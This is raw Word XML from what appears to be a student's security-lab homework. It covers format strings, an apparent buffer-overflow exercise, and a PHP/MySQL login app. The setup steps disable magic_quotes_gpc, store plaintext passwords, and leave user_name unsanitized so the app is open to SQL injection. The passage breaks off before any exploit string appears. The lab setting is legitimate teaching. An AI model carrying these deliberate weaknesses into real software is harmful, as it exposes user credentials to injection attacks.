          <w:b/>
        </w:rPr>
        <w:t>Snyder_HW_03_03_dtors.png</w:t>
      </w:r>
      <w:r w:rsidR="00E5743C" w:rsidRPr="00812EE3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidRPr="00812EE3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Snyder_HW_03_0</w:t>
      </w:r>
      <w:r w:rsidR="00E5743C" w:rsidRPr="00812EE3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00812EE3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00E5743C" w:rsidRPr="00812EE3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>arg</w:t>
      </w:r>
      <w:r w:rsidRPr="00812EE3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00E5743C" w:rsidRPr="00812EE3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>png</w:t>
      </w:r>
      <w:r w:rsidRPr="00812EE3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>; Snyder_HW_03_02_</w:t>
      </w:r>
      <w:r w:rsidR="00E5743C" w:rsidRPr="00812EE3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>tmpBuf.png</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00E5743C" w:rsidRPr="00812EE3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E5743C" w:rsidRPr="00812EE3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Snyder_HW_03_03</w:t>
      </w:r>
      <w:r w:rsidRPr="00812EE3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00E5743C" w:rsidRPr="00812EE3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00812EE3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00E5743C" w:rsidRPr="00812EE3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>png</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E5743C" w:rsidRPr="00202636" w:rsidRDefault="00E5743C" w:rsidP="00E5743C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00875543" w:rsidRDefault="00202636" w:rsidP="00875543">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Write a program that demonstrates the use of format strings for output functions. It should be a suitable example for an introductory programming course</w:t>
      </w:r>
      <w:r w:rsidR="00875543">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A24F9" w:rsidRPr="000A24F9" w:rsidRDefault="000A24F9" w:rsidP="000A24F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A24F9">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>File name: Snyder_HW_02_04.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00202636" w:rsidRPr="00202636" w:rsidRDefault="00202636" w:rsidP="00202636">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00202636" w:rsidRDefault="00202636" w:rsidP="00202636">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Create a web application that uses a MySQL database backend. Demonstrate it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA3294" w:rsidRPr="00EA3294" w:rsidRDefault="00EA3294" w:rsidP="002F2F26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">To </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>setup the web application (for questions 5-7)</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>follow these steps</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA3294" w:rsidRPr="00EA3294" w:rsidRDefault="00EA3294" w:rsidP="00EA3294">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Turn off </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>magic_quotes_gpc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00EA3294" w:rsidRPr="00EA3294" w:rsidRDefault="00EA3294" w:rsidP="00EA3294">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> vi /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/php5/apache2/php.ini</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA3294" w:rsidRPr="00EA3294" w:rsidRDefault="00EA3294" w:rsidP="00EA3294">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Find: “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>magic_quotes_gpc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> = On”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA3294" w:rsidRPr="00EA3294" w:rsidRDefault="00EA3294" w:rsidP="00EA3294">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Change to: “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>magic_quotes_gpc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> = Off”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA3294" w:rsidRPr="00EA3294" w:rsidRDefault="00EA3294" w:rsidP="00EA3294">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Restart the apache server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA3294" w:rsidRPr="00EA3294" w:rsidRDefault="00EA3294" w:rsidP="00EA3294">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> service apache2 restart</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA3294" w:rsidRPr="00EA3294" w:rsidRDefault="00EA3294" w:rsidP="00EA3294">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Copy the files to the /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/www directory:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA3294" w:rsidRPr="00EA3294" w:rsidRDefault="00EA3294" w:rsidP="00EA3294">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Snyder_HW_03_05_login.html /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/www/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA3294" w:rsidRPr="00EA3294" w:rsidRDefault="00EA3294" w:rsidP="00EA3294">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Snyder_HW_03_05_signin.php /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/www/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA3294" w:rsidRPr="00EA3294" w:rsidRDefault="00EA3294" w:rsidP="00EA3294">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Snyder_HW_03_07_signin_fixed.php /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/www/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA3294" w:rsidRPr="00EA3294" w:rsidRDefault="00EA3294" w:rsidP="00EA3294">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Setup </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00EA3294" w:rsidRPr="00EA3294" w:rsidRDefault="00EA3294" w:rsidP="00EA3294">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> –u seed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA3294" w:rsidRPr="00EA3294" w:rsidRDefault="00EA3294" w:rsidP="00EA3294">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">create database </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>test_db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA3294" w:rsidRPr="00EA3294" w:rsidRDefault="00EA3294" w:rsidP="00EA3294">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>test_db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA3294" w:rsidRPr="00EA3294" w:rsidRDefault="00EA3294" w:rsidP="00EA3294">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CREATE TABLE Users (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>user_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">(9) NOT NULL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>auto_increment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>user_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> VARCHAR(40) NOT NULL, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> VARCHAR(40) NOT NULL, PRIMARY KEY(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>user_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA3294" w:rsidRPr="00EA3294" w:rsidRDefault="00EA3294" w:rsidP="00EA3294">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>INSERT INTO Users (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>user_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>) VALUES ('Sal','</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SalPwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA3294" w:rsidRPr="00EA3294" w:rsidRDefault="00EA3294" w:rsidP="00EA3294">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>INSERT INTO Users (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>user_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>) VALUES ('Mal','</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PwdMal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA3294" w:rsidRPr="00EA3294" w:rsidRDefault="00EA3294" w:rsidP="00EA3294">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Open in </w:t>
      </w:r>
      <w:r w:rsidR="00BD33F2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>irefox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F2F26" w:rsidRPr="00EA3294" w:rsidRDefault="00EA3294" w:rsidP="00EA3294">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>http://l</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ocalhost/Snyder_HW_03_05_login.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00202636" w:rsidRPr="00EA3294" w:rsidRDefault="00EA3294" w:rsidP="00202636">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>File names: Snyder_HW_03_05</w:t>
      </w:r>
      <w:r w:rsidR="00202636" w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>login.html; Snyder_HW_03_05</w:t>
      </w:r>
      <w:r w:rsidR="00202636" w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA3294">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>signing.php; Snyder_HW_03_07_signin_fixed.php; Snyder_HW_03_05_incorrect_login.png; Snyder_HW_03_05_incorrect_login_msg.png; Snyder_HW_03_05_correct_login.png; Snyder_HW_03_05_correct_login_msg.png;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00202636" w:rsidRPr="00202636" w:rsidRDefault="00202636" w:rsidP="00202636">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002F2F26" w:rsidRDefault="00202636" w:rsidP="002F2F26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Create a web application that uses a MySQL database backend that suffers from a SQL injection vulnerability. Demonstrate it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F2F26" w:rsidRPr="004D3FD8" w:rsidRDefault="00202636" w:rsidP="00202636">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:r w:rsidR="002F2F26" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>web application, “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BD33F2" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>user_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002F2F26" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002F2F26" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>is not sanitized</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="002F2F26" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002F2F26" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>mysql_real_escape_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002F2F26" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>. This means a user can type a specifically crafted exploit string</w:t>
      </w:r>
      <w:r w:rsidR="00BD33F2" w:rsidRPr="004D3FD8">
        <w:rPr>
